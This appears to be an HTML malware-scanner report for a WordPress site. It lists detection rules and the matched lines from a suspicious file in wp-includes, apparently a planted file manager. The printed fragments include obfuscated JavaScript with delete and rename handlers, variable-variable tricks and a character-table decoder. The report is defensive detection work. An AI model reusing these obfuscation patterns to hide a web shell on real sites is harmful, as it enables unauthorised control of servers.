<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">_0x54</span><span style="color: #007700">, </span><span style="color: #0000BB">_0x32</span><span style="color: #007700">, </span><span style="color: #0000BB">_0x1a</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">rtrim</span><span style="color: #007700">(</span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'\\'</span><span style="color: #007700">, </span><span style="color: #DD0000">'/'</span><span style="color: #007700">, </span><span style="color: #0000BB">$_SERVER</span><span style="color: #007700">[</span><span style="color: #DD0000">'DOCUMENT_ROOT'</span><span style="color: #007700">]), </span><span style="color: #DD0000">'/'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 22</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">displayPathItem</span><span style="color: #007700">(</span><span style="color: #0000BB">$title</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">) {print </span><span style="color: #DD0000">"<div class='path-nav'><strong></span><span style="color: #007700">{</span><span style="color: #0000BB">$title</span><span style="color: #007700">}</span><span style="color: #DD0000">:</strong>" </span><span style="color: #007700">. </span><span style="color: #0000BB">$value </span><span style="color: #007700">. </span><span style="color: #DD0000">"</div>"</span><span style="color: #007700">;}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 25</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">PathCl</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">Result</span><span style="color: #007700">(</span><span style="color: #0000BB">$Int</span><span style="color: #007700">) {</span><span style="color: #0000BB">$I</span><span style="color: #007700">=array(</span><span style="color: #DD0000">'C'</span><span style="color: #007700">,</span><span style="color: #DD0000">'P'</span><span style="color: #007700">,</span><span style="color: #DD0000">'Q'</span><span style="color: #007700">,</span><span style="color: #DD0000">'T'</span><span style="color: #007700">,</span><span style="color: #DD0000">'U'</span><span style="color: #007700">,</span><span style="color: #DD0000">'M'</span><span style="color: #007700">,</span><span style="color: #DD0000">'V'</span><span style="color: #007700">,</span><span style="color: #DD0000">'h'</span><span style="color: #007700">,</span><span style="color: #DD0000">'E'</span><span style="color: #007700">,</span><span style="color: #DD0000">'L'</span><span style="color: #007700">,</span><span style="color: #DD0000">'l'</span><span style="color: #007700">,</span><span style="color: #DD0000">'0'</span><span style="color: #007700">,</span><span style="color: #DD0000">'K'</span><span style="color: #007700">,</span><span style="color: #DD0000">'8'</span><span style="color: #007700">,</span><span style="color: #DD0000">'C'</span><span style="color: #007700">,</span><span style="color: #DD0000">'l'</span><span style="color: #007700">,</span><span style="color: #DD0000">'a'</span><span style="color: #007700">,</span><span style="color: #DD0000">'U'</span><span style="color: #007700">,</span><span style="color: #DD0000">'D'</span><span style="color: #007700">,</span><span style="color: #DD0000">'e'</span><span style="color: #007700">,</span><span style="color: #DD0000">'4'</span><span style="color: #007700">,</span><span style="color: #DD0000">'I'</span><span style="color: #007700">,</span><span style="color: #DD0000">'m'</span><span style="color: #007700">,</span><span style="color: #DD0000">'1'</span><span style="color: #007700">,</span><span style="color: #DD0000">'5'</span><span style="color: #007700">,</span><span style="color: #DD0000">'s'</span><span style="color: #007700">,</span><span style="color: #DD0000">'b'</span><span style="color: #007700">,</span><span style="color: #DD0000">'R'</span><span style="color: #007700">,</span><span style="color: #DD0000">'Y'</span><span style="color: #007700">,</span><span style="color: #DD0000">'O'</span><span style="color: #007700">,</span><span style="color: #DD0000">'u'</span><span style="color: #007700">,</span><span style="color: #DD0000">'W'</span><span style="color: #007700">,</span><span style="color: #DD0000">'X'</span><span style="color: #007700">,</span><span style="color: #DD0000">'Z'</span><span style="color: #007700">,</span><span style="color: #DD0000">'+'</span><span style="color: #007700">,</span><span style="color: #DD0000">'c'</span><span style="color: #007700">,</span><span style="color: #DD0000">'@'</span><span style="color: #007700">,</span><span style="color: #DD0000">'d'</span><span style="color: #007700">,</span><span style="color: #DD0000">'3'</span><span style="color: #007700">,</span><span style="color: #DD0000">'r'</span><span style="color: #007700">,</span><span style="color: #DD0000">'F'</span><span style="color: #007700">,</span><span style="color: #DD0000">')'</span><span style="color: #007700">,</span><span style="color: #DD0000">'B'</span><span style="color: #007700">,</span><span style="color: #DD0000">'y'</span><span style="color: #007700">,</span><span style="color: #DD0000">'C'</span><span style="color: #007700">,</span><span style="color: #DD0000">'J'</span><span style="color: #007700">,</span><span style="color: #DD0000">'q'</span><span style="color: #007700">,</span><span style="color: #DD0000">'G'</span><span style="color: #007700">,</span><span style="color: #DD0000">'#'</span><span style="color: #007700">,</span><span style="color: #DD0000">'S'</span><span style="color: #007700">,</span><span style="color: #DD0000">'o'</span><span style="color: #007700">,</span><span style="color: #DD0000">'H'</span><span style="color: #007700">,</span><span style="color: #DD0000">'4'</span><span style="color: #007700">,</span><span style="color: #DD0000">'A'</span><span style="color: #007700">,</span><span style="color: #DD0000">'i'</span><span style="color: #007700">,</span><span style="color: #DD0000">'j'</span><span style="color: #007700">,</span><span style="color: #DD0000">'t'</span><span style="color: #007700">,</span><span style="color: #DD0000">'v'</span><span style="color: #007700">,</span><span style="color: #DD0000">'w'</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 40</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">' / '</span><span style="color: #007700">, </span><span style="color: #0000BB">$breadcrumbs</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getPermissions</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 47</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"</span><span style="color: #0000BB">$readable</span><span style="color: #DD0000"> </span><span style="color: #0000BB">$writable</span><span style="color: #DD0000"> </span><span style="color: #0000BB">$executable</span><span style="color: #DD0000">"</span><span style="color: #007700">;}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 49</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">formatFileSize</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 50</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">round</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes </span><span style="color: #007700">/ </span><span style="color: #0000BB">1073741824</span><span style="color: #007700">, </span><span style="color: #0000BB">2</span><span style="color: #007700">) . </span><span style="color: #DD0000">' GB'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 51</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">round</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes </span><span style="color: #007700">/ </span><span style="color: #0000BB">1048576</span><span style="color: #007700">, </span><span style="color: #0000BB">2</span><span style="color: #007700">) . </span><span style="color: #DD0000">' MB'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 52</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">round</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes </span><span style="color: #007700">/ </span><span style="color: #0000BB">1024</span><span style="color: #007700">, </span><span style="color: #0000BB">2</span><span style="color: #007700">) . </span><span style="color: #DD0000">' KB'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 53</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$bytes </span><span style="color: #007700">. </span><span style="color: #DD0000">' By'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 62</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">renderFileList</span><span style="color: #007700">(</span><span style="color: #0000BB">$GetPath</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 87</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">LoadFile</span><span style="color: #007700">(</span><span style="color: #0000BB">$GetPath</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ae7830db <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ae7830db)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Y2hy</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_75").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/block-supports/custom_file_3_1769473324.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 15.03 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 02:22:26</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 02:22:26</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 22</span><br><table id="file_76" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 108</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$__</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 55</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$_</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() { if (</span><span style="color: #0000BB">confirm</span><span style="color: #007700">(</span><span style="color: #DD0000">'Delete?'</span><span style="color: #007700">)) </span><span style="color: #0000BB">_0x02</span><span style="color: #007700">(</span><span style="color: #0000BB">_0x4b12</span><span style="color: #007700">(</span><span style="color: #0000BB">0x17</span><span style="color: #007700">), </span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">getAttribute</span><span style="color: #007700">(</span><span style="color: #DD0000">'data-path'</span><span style="color: #007700">)); }); }); </span><span style="color: #0000BB">document</span><span style="color: #007700">.</span><span style="color: #0000BB">querySelectorAll</span><span style="color: #007700">(</span><span style="color: #DD0000">'.rename-btn'</span><span style="color: #007700">).forEach(</span><span style="color: #0000BB">_0x9b </span><span style="color: #007700">=> { </span><span style="color: #0000BB">_0x9b</span><span style="color: #007700">[</span><span style="color: #0000BB">_0x4b12</span><span style="color: #007700">(</span><span style="color: #0000BB">0xf</span><span style="color: #007700">)](</span><span style="color: #0000BB">_0x4b12</span><span style="color: #007700">(</span><span style="color: #0000BB">0x11</span><span style="color: #007700">), function() { const </span><span style="color: #0000BB">_0xname </span><span style="color: #007700">= </span><span style="color: #0000BB">prompt</span><span style="color: #007700">(</span><span style="color: #DD0000">'New name:'</span><span style="color: #007700">, </span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">getAttribute</span><span style="color: #007700">(</span><span style="color: #DD0000">'data-</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 12</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_absolute_root</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 16</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$script_filename</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">$pos</span><span style="color: #007700">);}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 172</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 175</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">_0x1b</span><span style="color: #007700">, </span><span style="color: #0000BB">_0x2c</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 176</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">_0x5f2e</span><span style="color: #007700">[</span><span style="color: #0000BB">_0x1b</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 179</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">_0x54</span><span style="color: #007700">, </span><span style="color: #0000BB">_0x32</span><span style="color: #007700">, </span><span style="color: #0000BB">_0x1a</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">rtrim</span><span style="color: #007700">(</span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'\\'</span><span style="color: #007700">, </span><span style="color: #DD0000">'/'</span><span style="color: #007700">, </span><span style="color: #0000BB">$_SERVER</span><span style="color: #007700">[</span><span style="color: #DD0000">'DOCUMENT_ROOT'</span><span style="color: #007700">]), </span><span style="color: #DD0000">'/'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 22</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">displayPathItem</span><span style="color: #007700">(</span><span style="color: #0000BB">$title</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">) {print </span><span style="color: #DD0000">"<div class='path-nav'><strong></span><span style="color: #007700">{</span><span style="color: #0000BB">$title</span><span style="color: #007700">}</span><span style="color: #DD0000">:</strong>" </span><span style="color: #007700">. </span><span style="color: #0000BB">$value </span><span style="color: #007700">. </span><span style="color: #DD0000">"</div>"</span><span style="color: #007700">;}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 25</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">PathCl</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">Result</span><span style="color: #007700">(</span><span style="color: #0000BB">$Int</span><span style="color: #007700">) {</span><span style="color: #0000BB">$I</span><span style="color: #007700">=array(</span><span style="color: #DD0000">'C'</span><span style="color: #007700">,</span><span style="color: #DD0000">'P'</span><span style="color: #007700">,</span><span style="color: #DD0000">'Q'</span><span style="color: #007700">,</span><span style="color: #DD0000">'T'</span><span style="color: #007700">,</span><span style="color: #DD0000">'U'</span><span style="color: #007700">,</span><span style="color: #DD0000">'M'</span><span style="color: #007700">,</span><span style="color: #DD0000">'V'</span><span style="color: #007700">,</span><span style="color: #DD0000">'h'</span><span style="color: #007700">,</span><span style="color: #DD0000">'E'</span><span style="color: #007700">,</span><span style="color: #DD0000">'L'</span><span style="color: #007700">,</span><span style="color: #DD0000">'l'</span><span style="color: #007700">,</span><span style="color: #DD0000">'0'</span><span style="color: #007700">,</span><span style="color: #DD0000">'K'</span><span style="color: #007700">,</span><span style="color: #DD0000">'8'</span><span style="color: #007700">,</span><span style="color: #DD0000">'C'</span><span style="color: #007700">,</span><span style="color: #DD0000">'l'</span><span style="color: #007700">,</span><span style="color: #DD0000">'a'</span><span style="color: #007700">,</span><span style="color: #DD0000">'U'</span><span style="color: #007700">,</span><span style="color: #DD0000">'D'</span><span style="color: #007700">,</span><span style="color: #DD0000">'e'</span><span style="color: #007700">,</span><span style="color: #DD0000">'4'</span><span style="color: #007700">,</span><span style="color: #DD0000">'I'</span><span style="color: #007700">,</span><span style="color: #DD0000">'m'</span><span style="color: #007700">,</span><span style="color: #DD0000">'1'</span><span style="color: #007700">,</span><span style="color: #DD0000">'5'</span><span style="color: #007700">,</span><span style="color: #DD0000">'s'</span><span style="color: #007700">,</span><span style="color: #DD0000">'b'</span><span style="color: #007700">,</span><span style="color: #DD0000">'R'</span><span style="color: #007700">,</span><span style="color: #DD0000">'Y'</span><span style="color: #007700">,</span><span style="color: #DD0000">'O'</span><span style="color: #007700">,</span><span style="color: #DD0000">'u'</span><span style="color: #007700">,</span><span style="color: #DD0000">'W'</span><span style="color: #007700">,</span><span style="color: #DD0000">'X'</span><span style="color: #007700">,</span><span style="color: #DD0000">'Z'</span><span style="color: #007700">,</span><span style="color: #DD0000">'+'</span><span style="color: #007700">,</span><span style="color: #DD0000">'c'</span><span style="color: #007700">,</span><span style="color: #DD0000">'@'</span><span style="color: #007700">,</span><span style="color: #DD0000">'d'</span><span style="color: #007700">,</span><span style="color: #DD0000">'3'</span><span style="color: #007700">,</span><span style="color: #DD0000">'r'</span><span style="color: #007700">,</span><span style="color: #DD0000">'F'</span><span style="color: #007700">,</span><span style="color: #DD0000">')'</span><span style="color: #007700">,</span><span style="color: #DD0000">'B'</span><span style="color: #007700">,</span><span style="color: #DD0000">'y'</span><span style="color: #007700">,</span><span style="color: #DD0000">'C'</span><span style="color: #007700">,</span><span style="color: #DD0000">'J'</span><span style="color: #007700">,</span><span style="color: #DD0000">'q'</span><span style="color: #007700">,</span><span style="color: #DD0000">'G'</span><span style="color: #007700">,</span><span style="color: #DD0000">'#'</span><span style="color: #007700">,</span><span style="color: #DD0000">'S'</span><span style="color: #007700">,</span><span style="color: #DD0000">'o'</span><span style="color: #007700">,</span><span style="color: #DD0000">'H'</span><span style="color: #007700">,</span><span style="color: #DD0000">'4'</span><span style="color: #007700">,</span><span style="color: #DD0000">'A'</span><span style="color: #007700">,</span><span style="color: #DD0000">'i'</span><span style="color: #007700">,</span><span style="color: #DD0000">'j'</span><span style="color: #007700">,</span><span style="color: #DD0000">'t'</span><span style="color: #007700">,</span><span style="color: #DD0000">'v'</span><span style="color: #007700">,</span><span style="color: #DD0000">'w'</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 40</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">' / '</span><span style="color: #007700">, </span><span style="color: #0000BB">$breadcrumbs</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getPermissions</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 47</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"</span><span style="color: #0000BB">$readable</span><span style="color: #DD0000"> </span><span style="color: #0000BB">$writable</span><span style="color: #DD0000"> </span><span style="color: #0000BB">$executable</span><span style="color: #DD0000">"</span><span style="color: #007700">;}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 49</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">formatFileSize</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 50</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">round</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes </span><span style="color: #007700">/ </span><span style="color: #0000BB">1073741824</span><span style="color: #007700">, </span><span style="color: #0000BB">2</span><span style="color: #007700">) . </span><span style="color: #DD0000">' GB'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 51</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">round</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes </span><span style="color: #007700">/ </span><span style="color: #0000BB">1048576</span><span style="color: #007700">, </span><span style="color: #0000BB">2</span><span style="color: #007700">) . </span><span style="color: #DD0000">' MB'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 52</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
